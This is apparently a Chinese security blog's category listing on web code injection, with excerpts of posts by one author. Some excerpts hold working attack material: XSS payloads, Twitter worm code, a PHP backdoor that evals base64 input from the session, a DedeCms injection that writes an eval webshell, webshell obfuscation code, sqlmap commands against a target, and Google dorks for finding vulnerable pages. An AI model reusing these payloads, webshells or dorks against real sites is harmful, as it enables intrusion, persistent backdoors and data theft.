Web 代码注入
文章平均质量分 55
Yatere
求职,求合伙人,求项目。网络安全方面。
人生就好像一杆天平,虽明知没有绝对的平衡,但我们也在不断尝试,因为我们相信奇迹总会出现。
展开
-
关于属性中没有对双引号转义的XSS方式 FF IE Opera通杀
<br />某网站存在一个 storeXSS 利用点如下<br /><input type=text value="[xsscode]"><br />可以使用 双引号绕过去属性限制,但是不能采用 < > 比较郁闷<br />开始打算 <br />"style="kj:expression(EXP)<br /><input type=text value=""style="kj:expression(EXP)"><br />后来查了查资料!发现expression是IE 才能使用的!郁闷了!<br />而原创 2011-05-14 03:22:00 · 1825 阅读 · 0 评论 -
早期的Twitte蠕虫
function XHConn(){ //创建XMLHttpRequest对象 var xmlhttp, bComplete = false; //由于 Internet Explorer 浏览器使用 MSXML 解析器处理 XML,而且MSXML 实际上有两种不同的版本,因此采用以下两种方式创建对象 try { xmlhttp = new ActiveXObject("Msxm原创 2012-02-13 14:38:44 · 817 阅读 · 0 评论 -
xss相关的少见内容
expression的变形千变万化,只需要根据CSS Parser进行FUZZER就能挖掘很多WEBMAIL的XSS 0DAY。 下面是几个我记得的例子: 1.IE的CSS语法解析很宽松,导致的执行代码的特例。 .ExternalClass #ecxx {color:rgb(''zzzz"x:expression(alert());} 2转载 2012-03-27 19:33:18 · 881 阅读 · 0 评论 -
dz2.5 oday
刚群里黑哥丢出个乌云的链接:http://www.wooyun.org/bugs/wooyun-2012-06420问谁上,我说我上吧,职业病,看到discuz dede啥的漏洞一下就精神了,哈哈……过程简单说下,记的有点乱不贴太多代码了diff一下看balabalabala..... if(!defined('IN_DISCUZ')) {@@ -89,7 +转载 2012-04-27 16:01:09 · 1744 阅读 · 4 评论 -
CVE-2012-1823(PHP-CGI RCE)的PoC及技术挑战
国外又发布了一个牛逼闪闪的php cgi远程任意代码执行漏洞:http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ 粗看一下貌似没啥危害,因为php做了防范,在cgi这个sapi下是无法使用-r,-f等直接执行命令的参数的。只有少数几个参数可以使用,因此公告里也就给出了使用-s参数读取源文件的poc。 另外关于RC转载 2012-05-07 17:32:20 · 2194 阅读 · 0 评论 -
实战安全工程师训练佳品之WebGoat
实战安全工程师训练佳品之WebGoatWebGoat是由著名的OWASP负责维护的一个漏洞百出的J2EE Web应用程序,这些漏洞并非程序中的bug,而是故意设计用来讲授Web应用程序安全课程的。这个应用程序提供了一个逼真的教学环境,为用户完成课程提供了有关的线索。对 于每堂课,都对应于WebGoat应用程序中的一个实际的安全漏洞,为了能亲身实践如何利用这个漏洞,您首先需要具备该漏转载 2012-05-08 10:28:21 · 1008 阅读 · 1 评论 -
用于演示mssql 注入的漏洞代码
需要演示,所以临时写了一个,主要是介绍原理:<%dim conn dim connstr Set conn = Server.CreateObject("ADODB.Connection") connstr="driver={SQL Server};server=192.168.1.128;UID=sa;PWD=123;database=123" conn.Open co原创 2012-07-05 23:38:05 · 1213 阅读 · 1 评论 -
sqlmap 使用,收藏备用
选取网站:http://www.XXXX.org/item.php?id=1,在sqlmap中输入命令:sqlmap -u http://www.XXXXX.org/item.php?id=1 --dbs 其中-u 是使用的url,--dbs是列数据库。若是能进行注入的话,该数据库就能列出来。结果如下:这样可以存在的数据库名称。发现数据库后需要获取数据库中的表信息。命令:sqlma转载 2012-10-16 22:14:47 · 1101 阅读 · 0 评论 -
python 并发编程
python 并发除了直接基于编译内核的 Stackless python还有比较突出的一些例如gevent,eventlet greenlet等,主要概念是协程。以下是用刷票(客户端)的例子,比多线程快n倍,不过还是不如Stackless:(ps:erlang并发还不如python 基于协程的Stackless)gevent效率要高于eventletimpor原创 2013-03-27 21:44:09 · 1729 阅读 · 0 评论 -
常见查询接口
第一个接口,查询ip地址的地理信息接口:r'http://api.ipinfodb.com//v2/ip_query.php?key=5eb5b4de91741e2e4b98748989dc84f3236b55f6dd38aa689921884867536f36&ip={}&output=json&timezone=false' 获得子域名信息,google接口:se原创 2013-04-14 23:19:47 · 1719 阅读 · 2 评论 -
python http proxy
# -*- coding: utf8 -*-import socket, thread, select__version__ = '0.1.0 Draft 1'BUFLEN = 8192VERSION = 'Python Proxy/'+__version__HTTPVER = 'HTTP/1.1'class ConnectionHandler: def __init__转载 2013-04-29 23:59:55 · 3199 阅读 · 0 评论 -
php webshell 加密代码
import reimport sysimport base64, codecsfrom random import random, randrange, choice, shuffle, randintfrom collections import *from inspect import getargspecdef random_string(charset = 'abcdefgh转载 2013-04-07 15:58:55 · 1792 阅读 · 0 评论 -
80sec里面的小马
session_start();$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');黑客果然是为了ev原创 2012-02-07 12:16:20 · 969 阅读 · 0 评论 -
Hash碰撞与拒绝服务攻击
文/玄魂1.Hash与Hash碰撞 Hash,简单来讲,是一种将任意长度的输入变换成固定长度的输出,固定长度的输出在“实际应用场景”下可以代表该输入。Hash函数通常被翻译成散列函数。Hash通常用来校验信息的一致性。Hash函数的实现多种多样,在安全领域应用最为广泛的是SHA-x系列和MDx系列。Hash函数也划分为带密钥的Hash函数和不带密钥的Hash函数转载 2012-01-07 11:39:11 · 1041 阅读 · 0 评论 -
蓝海豚团购系统上传.包含.读取文件漏洞
经典对白看代码...controls/user.class.php 客户操作类01function addgroup_action() //index.php?con=user&act=addgroup02 {03 if(!$GLOBALS['session']->get('uid')) //验证是否登录user04 {05 sheader(url('user','login')转载 2011-04-25 13:37:00 · 1685 阅读 · 0 评论 -
Dawei 团购 变量未初值化
01if($cateid)02{03 $container.=' and grouptype="'.$cateid.'"';04}05if($cityid)06{07 $container.=' and cityid="'.$cityid.'"';08}09 10$order=" order by recommend desc,sortorder desc";11$sql="select * from ".tname('groups')." where 1".$container转载 2011-04-25 13:39:00 · 1212 阅读 · 0 评论 -
phpcms V9 BLind SQL Injection Vulnerability
<br />=================================================================<br /> phpcms V9 BLind SQL Injection Vulnerability<br />=================================================================<br /><br />Software: phpcms V9<br />Vendor: www.转载 2011-04-25 14:18:00 · 1075 阅读 · 0 评论 -
about utf7-BOM string injection
<br /><br />about utf7-BOM string injection <br /><br />在一次和大牛Mario Heiderich的交流中,他问我知不知道“+/v8”,那时候我对这个一无所知,于是他就发我大牛Gareth Heyes'的一paper《XSS Lightsabre techniques》,在ppt的34页里:<br /><br />CSS expressions with UTF-7<br />• UTF-7 BOM character can force UTF-7转载 2011-04-24 22:05:00 · 1078 阅读 · 0 评论 -
PHP程序的常见漏洞攻击分析
<br /><br />不是固若金汤,随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。这里,我们将从全局变量,远程文件,文<br />件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性。<br />如何通过全局变量进行攻击?<br />PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处理方法<br />。一旦一个变量被创建了,就可原创 2011-04-24 22:31:00 · 649 阅读 · 0 评论 -
DedeCms v5.6 嵌入恶意代码执行漏洞
在上传软件的地方,对本地地址没有进行有效的验证,可以被恶意利用注册会员,上传软件:本地地址中填入a{/dede:link}{dede:toby57 name/="']=0;phpinfo();//"}x{/dede:toby57},发表后查看或修改即可执行a{/dede:link}{dede:toby57 name/="']=0;fputs(fopen(base64_decode(eC5waHA),w),base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz转载 2011-04-25 14:23:00 · 1250 阅读 · 0 评论 -
PHP程序的常见漏洞攻击分析
<br /><br />不是固若金汤,随着PHP的广泛运用,一些黑客们也在无时不想找PHP的麻烦,通过PHP程序漏洞进行攻击就是其中一种。这里,我们将从全局变量,远程文件,文<br />件上载,库文件,Session文件,数据类型和容易出错的函数这几个方面分析了PHP的安全性。<br />如何通过全局变量进行攻击?<br />PHP中的变量不需要事先声明,它们会在第一次使用时自动创建,它们的类型根据上下文环境自动确定。从程序员的角度来看,这无疑是一种极其方便的处理方法<br />。一旦一个变量被创建了,就可转载 2011-04-24 22:32:00 · 704 阅读 · 0 评论 -
部分google hacking的搜索内容
inurl:index.php?id=inurl:trainers.php?id=inurl:buy.php?category=inurl:article.php?ID=inurl:play_old.php?id=inurl:declaration_more.原创 2011-09-05 22:58:36 · 55197 阅读 · 0 评论 -
深掘XSS漏洞场景之XSS Rootkit
0×00 前言众所周知XSS漏洞的风险定义一直比较模糊,XSS漏洞属于高危漏洞还是低风险漏洞一直以来都有所争议。XSS漏洞类型主要分为持久型和非持久型两种:1. 非持久型XSS漏洞一般存在于URL参数中,需要访问黑客构造好的特定URL才能触发漏洞。2. 持久型XSS漏洞一般存在于富文本等交互功能,如发帖留言等,黑客使用的XSS内容经正常功能进入数据库持久保存。3. DOM XSS漏转载 2011-10-24 08:30:28 · 1106 阅读 · 0 评论 -
Using XSS to bypass CSRF protection
Using XSS to bypass CSRF protection// Autor: Nytro// Contact: nytro_rst@yahoo.com// Translated by: SENEQ_o// Published on: 28 Octombrie 2009// Romanian Security Team?>1) About XSS2)转载 2011-11-16 15:59:55 · 6170 阅读 · 0 评论 -
Tiny php shell
Have you ever needed a small shell written in PHP?Of course you have. But I bet it haven't been all too stealth!This is really pointless, but someone might be interested in it.So here you go f转载 2011-10-27 16:39:29 · 1067 阅读 · 0 评论 -
Discuz!后台怎么拿到Webshell
趁着地球还没毁灭,赶紧放出来。预祝"单恋一枝花"童鞋生日快乐。恭喜我的浩方Dota升到2级。希望世界和平。我不是标题党,你们敢踩我。敢踩我。。踩我。。。我……既然还没跪,我就从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,利用方式有所不同,下面开始。一 Discuz! 6.0 和 Discuz! 7.0既然要后台拿Shell,文件写入必看。转载 2011-04-25 13:56:00 · 2271 阅读 · 0 评论 -
wuyun 直接可以看的文章
for someone:不需要邀请码直接可以看的文章,截止今日,地址见下:http://zone.wooyun.org/content/29http://zone.wooyun.org/content/38http://zone.wooyun.org/content/44http://zone.wooyun.org/content/48http://zone.wooyun.原创 2013-05-17 00:13:44 · 3744 阅读 · 0 评论